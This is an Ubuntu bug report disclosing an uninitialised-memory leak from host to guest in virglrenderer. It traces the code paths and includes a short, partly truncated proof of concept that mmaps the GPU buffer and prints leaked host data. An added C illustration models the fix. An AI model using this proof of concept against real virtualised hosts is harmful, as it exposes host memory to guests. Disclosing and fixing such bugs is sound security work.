information leak from host to guest in the virglrenderer
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| virglrenderer (Ubuntu) | Fix Released | Undecided | Unassigned | |
| Bionic | Triaged | Undecided | Unassigned | |
| Focal | Fix Released | Undecided | Unassigned | |
| Impish | Fix Released | Undecided | Unassigned | |
Bug Description
Env
===
Description: Ubuntu 20.04.3 LTS
Release: 20.04
Package
=======
virglrenderer
Vulnerability
=============
The gr->ptr is allocated without initialization at the vrend_renderer_
virtio_
|
|-> virgl_cmd_
|
|-> virgl_renderer_
|
|-> vrend_renderer_
|
| if(args->target == PIPE_BUFFER && args->bind == VIRGL_BIND_CUSTOM) {
| gr->storage_bits |= VREND_STORAGE_
| gr->ptr = malloc(
| }
The memory pointed to by gr->ptr can be read from the guest kernel. The code path is as follows:
virtio_
|
|-> virgl_resource_
|
|-> virgl_renderer_
|
|-> vrend_renderer_
|
| res = vrend_resource_
| res->iov = iov;
| res->num_iovs = num_iovs;
| vrend_write_
| res->ptr, res->base.width0); // -- Here ---
However, the memory holding the data can be mmapped into a guest userspace process, and we can leak lots of data, as the size of the heap allocation (args->width) is controlled by the user.
The PoC is as follows:
dev = open(VIRTIO_GPU, O_RDONLY);
ioctl(dev, DRM_IOCTL_
ioctl(dev, DRM_IOCTL_
ptr = mmap(0, MAP_SZ, PROT_READ, MAP_SHARED, dev, vmap.offset);
for (i = 0; i < WIDTH/sizeof(*ptr); i++)
LOG("leak: ptr[%d]=%#lx\n", i, ptr[i]);
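As an added illustration (not code from this report or from virglrenderer), a hypothetical C model of the allocation choice behind the leak and of the transfer into guest iovecs: `res_create(width, 0)` follows the report's `malloc()`, `res_create(width, 1)` is the zero-initialising alternative, and `count_leaked_bytes()` is a defender's check that a transfer from a freshly created resource hands the guest no stale host bytes. The names `struct res`, `res_write_to_iov` and the two 2048-byte guest pages are assumptions of this example.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/uio.h>
/* Hypothetical stand-in for the host-side resource; only the fields the report touches. */
struct res {
    uint8_t *ptr;   /* host heap backing a PIPE_BUFFER created with VIRGL_BIND_CUSTOM */
    size_t width0;  /* guest-controlled size (args->width in the report) */
};

/* zero_init == 0 reproduces the report's malloc(): the buffer keeps whatever the host heap
 * held before. zero_init == 1 uses calloc(), so an early transfer hands back zeros instead. */
struct res *res_create(size_t width, int zero_init) {
    struct res *r = calloc(1, sizeof *r);
    if (!r) return NULL;
    r->ptr = zero_init ? calloc(1, width) : malloc(width);
    if (!r->ptr) { free(r); return NULL; }
    r->width0 = width;
    return r;
}

/* Stand-in for the write-to-iov step: scatter res->ptr into the guest's iovecs, never
 * past width0 or the iovec capacity. Returns the number of bytes copied. */
size_t res_write_to_iov(const struct res *r, struct iovec *iov, int num_iovs) {
    size_t done = 0;
    for (int i = 0; i < num_iovs && done < r->width0; i++) {
        size_t n = r->width0 - done;
        if (n > iov[i].iov_len) n = iov[i].iov_len;
        memcpy(iov[i].iov_base, r->ptr + done, n);
        done += n;
    }
    return done;
}

void res_free(struct res *r) { if (r) { free(r->ptr); free(r); } }

/* Defender's check: transfer a fresh resource into two constructed guest pages pre-filled
 * with 0xAA and count bytes that are non-zero afterwards. calloc(): must be 0. malloc():
 * unpredictable, which is exactly the stale-host-memory leak the report describes. */
long count_leaked_bytes(int zero_init) {
    static uint8_t page0[2048], page1[2048];
    memset(page0, 0xAA, sizeof page0); memset(page1, 0xAA, sizeof page1);
    struct iovec iov[2] = { { page0, sizeof page0 }, { page1, sizeof page1 } };
    struct res *r = res_create(sizeof page0 + sizeof page1, zero_init);
    if (!r) return -1;
    if (res_write_to_iov(r, iov, 2) != r->width0) { res_free(r); return -2; }
    long bad = 0;
    for (size_t i = 0; i < sizeof page0; i++) bad += (page0[i] != 0) + (page1[i] != 0);
    res_free(r);
    return bad;
}
```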
tags: added: community-security
Hi,
Have you reported this issue to the virglrenderer developers?
If not, please report it to them. The bug tracker is here:
https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues
Once you have done that, please let us know the bug number and once a fix is available we will package it for Ubuntu.
Thanks!